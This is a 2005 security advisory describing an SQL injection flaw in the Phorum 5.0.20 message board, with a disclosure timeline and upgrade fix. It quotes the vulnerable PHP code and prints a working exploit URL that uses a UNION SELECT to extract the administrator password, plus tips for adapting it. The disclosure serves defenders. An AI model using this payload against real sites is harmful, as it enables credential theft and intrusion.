{================================================================================}
{                              [waraxe-2005-SA#043]                              }
{================================================================================}
{                                                                                }
{                [ Sql injection in Phorum 5.0.20 and earlier ]                  }
{                                                                                }
{================================================================================}
                                                                                                                                
Author: Janek Vind "waraxe"
Date: 04. November 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-43.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Phorum 5.0.20

Homepage: http://phorum.org/


What is Phorum?
Phorum is a web based message board written in PHP.
Phorum is designed with high-availability and visitor ease
of use in mind. Features such as mailing list integration,
easy customization and simple installation make Phorum a
powerful add-in to any website.


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Critical sql injection has been found in Phorum 5.0.0.alpha
to 5.0.20. Phorum 5.1.x branch (in alpha stage) seems to be unaffected.


Details
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Problem lies in uninitialized array "$forum_ids" in "search.php" file.
>From source code:

----------------[ from source code ]------------------
$forum_ids[$row["forum_id"]] = $row["forum_id"];

	$match_number++;
	}
		
	$forums = phorum_db_get_forums($forum_ids);

	foreach($arr["rows"] as $key => $row){
		$arr["rows"][$key]["forum_url"] =
phorum_get_url(PHORUM_LIST_URL, $row["forum_id"]);
		$arr["rows"][$key]["forum_name"] =
$forums[$row["forum_id"]]["name"];
	}
----------------[ /from source code ]-----------------

This can give as possibilities to "inject" arbitrary data to "$forum_ids"
array by GPC and next let's look at "phorum_db_get_forums()" function from 
"include/db/mysql.php" :

----------------[ from source code ]------------------
    if (is_array($forum_ids)) $forum_ids = implode(",", $forum_ids);

    $sql = "select * from {$PHORUM['forums_table']} ";
    if ($forum_ids){
        $sql .= " where forum_id in ($forum_ids)";
    } elseif (func_num_args() > 1) {
        $sql .= " where parent_id = $parent_id";
        if(!defined("PHORUM_ADMIN")) $sql.=" and active=1";
    }

    $sql .= " order by display_order ASC, name";

    $res = mysql_query($sql, $conn);
    if ($err = mysql_error()) phorum_db_mysql_error("$err: $sql");

----------------[ /from source code ]-----------------

So sql query manipulation seems to be possible. Now let's try this
in real world ...

[------ real life exploit ------]

http://localhost/phorum520/search.php?1,search=a,page=1,match_type=ALL,
match_dates=30,match_forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99)
/**/UNION/**/ALL/**/SELECT/**/1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,21,32/**/FROM/**/phorum_users
/**/WHERE/**/admin=1/**/LIMIT/**/1/*

There are some critical conditions for exploit to be successful.

1. "register_globals" must be "on", so we can poison php variable space
through GPC.

2. "search=a" - this search string must return one or more results.

3. "SELECT/**/1,password" - first number in sql injection, in our case "1",
must be "forum_id" for forum in search results.

4. sql table prefix "phorum_" can be different, but this will give nice sql error
messages and reveal real prefix.

5. Some Phorum versions seems to have different table structure for "phorum_users",
so again, there will be sql error messages. It's easy to overcome this kind of
problem by altering sql injection string as "trial/error".

[----- /real life exploit ------]


See ya and have a nice day ;)


Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

01. november 2005 - vendor first contacted
01. november 2005 - vendor response
02. november 2005 - details emailed to vendor
03. november 2005 - vendor released new, patched version
04. november 2005 - public advisory released


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Download new Phorum version 5.0.21 from:

http://phorum.org/downloads/phorum-5.0.21.tar.gz

More info: http://phorum.org/story.php?57


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, Heintz, murdock, g0df4th3r, slimjim100, shai-tan,
y3dips and all other active members from waraxe community !

Tervitused - Raido Kerna !


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DX expedition database - http://www.dxdb.com/

Hard disc recovery - http://www.hdd911.com/


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------